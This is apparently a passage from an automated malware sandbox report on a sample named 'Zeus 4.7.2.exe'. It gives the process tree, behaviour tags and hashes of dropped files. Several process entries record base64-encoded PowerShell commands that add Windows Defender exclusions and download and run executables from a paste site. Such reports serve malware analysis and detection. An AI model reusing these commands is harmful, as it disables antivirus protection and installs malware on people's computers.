                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                              PID:2132
                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:6032
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\cimjmc2a.g2a0.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\cimjmc2a.g2a0.exe"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:1540
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BC70.tmp\BC71.tmp\BC72.bat C:\Users\Admin\AppData\Roaming\cimjmc2a.g2a0.exe"
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:404
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\cimjmc2a.g2a1.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\cimjmc2a.g2a1.exe"
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:5164
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\cimjmc2a.g2a2.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\cimjmc2a.g2a2.exe"
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:6056
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\cimjmc2a.g2a3.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\cimjmc2a.g2a3.exe"
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:5904
                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                    PID:5884
                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\ZeusHex\Zeus 4.7.2.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Downloads\ZeusHex\Zeus 4.7.2.exe"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                            PID:2184
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdwB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAdABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZgBoACMAPgA="
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                              PID:2112
                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:1836
                                                                                                                                                                                                                                                            • C:\Users\Admin\HadesHex-GUI.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\HadesHex-GUI.exe"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                              PID:928
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\explorer.exe"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:3800
                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                PID:2320
                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:2388
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1qihujz3.vad0.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1qihujz3.vad0.exe"
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:2880
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CF0E.tmp\CF0F.tmp\CF10.bat C:\Users\Admin\AppData\Roaming\1qihujz3.vad0.exe"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:436
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1qihujz3.vad1.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1qihujz3.vad1.exe"
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:4372
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1qihujz3.vad2.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1qihujz3.vad2.exe"
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:5800
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1qihujz3.vad3.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1qihujz3.vad3.exe"
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:3268
                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:1604
                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:3632
                                                                                                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:3876
                                                                                                                                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:4040
                                                                                                                                                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:3576
                                                                                                                                                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:4324
                                                                                                                                                                                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:4860
                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:4672
                                                                                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:432
                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:2780
                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                  PID:2120
                                                                                                                                                                                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                  PID:1840
                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:684
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:2964
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of UnmapMainImage
                                                                                                                                                                                                                                                                                      PID:4848
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:1380
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        PID:1444
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                        PID:1700
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:1648
                                                                                                                                                                                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:1056
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:4580
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                                                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:4072
                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:4336
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:5204
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                    PID:5616
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                    PID:2236
                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\ZeusHex\ZeusHex-GUI.dll"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                      PID:5232
                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:4936
                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2E8D6212573A5154CDF43496C3BC650F --mojo-platform-channel-handle=1752 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                              PID:5056
                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4EE7E237E63942D8448CBC052C7014F5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4EE7E237E63942D8448CBC052C7014F5 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:1976
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:2160
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            PID:6132
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:5060

                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              202KB

                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                              6a16cbefd2e29c459297b7ccc8d366ad

                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                              40da0213a9e5ea4cb6948f4a8e92b5e8b97e6cfe

                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                              9462da5aa6e2a762b02a24b7305bac86349e5b5ea182d36fd6a163de550cde60

                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                              6a9de0231f9987554a20208a89c6c802d28c57ecb6f9e95771c94156b65c61ac1e18298ce6d3f0559d3a08052845cc2014dab335e119fde731d745e4857b7d74

                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              3KB

                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                              d916203b36c48ade5485310429c2bfa4

                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                              c8ab1350da462058cb833d6a5cab2295d1ab98db

                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                              f231a54ad58718e4327973efad027afab8037f2e5efddd1aff4c618121636ed0

                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                              3dd9e16bc5f1f8cfc33f3c3d6b29bb18acf72be5240e41b6a20d32932760007901dba425d7c9aabdaad0c074a5b98208d5a82afc788e91ebc474ad1056aecf76

                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              528B

                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                              fbf733fd4daeb053db07588d4e0adb97

                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                              9e802d0269ba1566f2d5e4e266ae16ad7449be98

                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                              6c13d2325710c0dc77f5984c00d80b757fb1b71e2008e3f968eadd6465917a57

                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                              c97dfab86a202c92fcc02a4d2ae4e33afafb9a9f79a752e79ddbcbecb330ee19566b975e293f4a88c02c1134e43becfd5af8c45b7b1ea6aab14779da0d7bf61e

                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                              0b4eca4230c920e4b9b0086b91ad0554

                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                              72e52577b252f4369244d375f7f6298acbcaf40f

                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                              c259323b918bca61a970c359de6e945daf7d6a16755ab32f48a3750ec1c895cf

                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                              d959d62e90158b0ab08c71be60c3ff89c947c01f5ac9fe28c3b6c750516c10b1fea2153cb0a8b9de31bc33b007e8b29fcb8b381b822f16faa5fd6231f68a9e68

                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                              3KB

                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                              b4437201a0d2375b5c1d091777d94727

                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                              8f21ad113a013b2163bdc375f9f3a28898b4bdfb

                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                              b599077aadb75fe4e1c5e67fd1a0d1adc5ff1ea94989b7edb3163f31eb4d4347

                                                                                                                                                                                                                                                                                                              SHA512

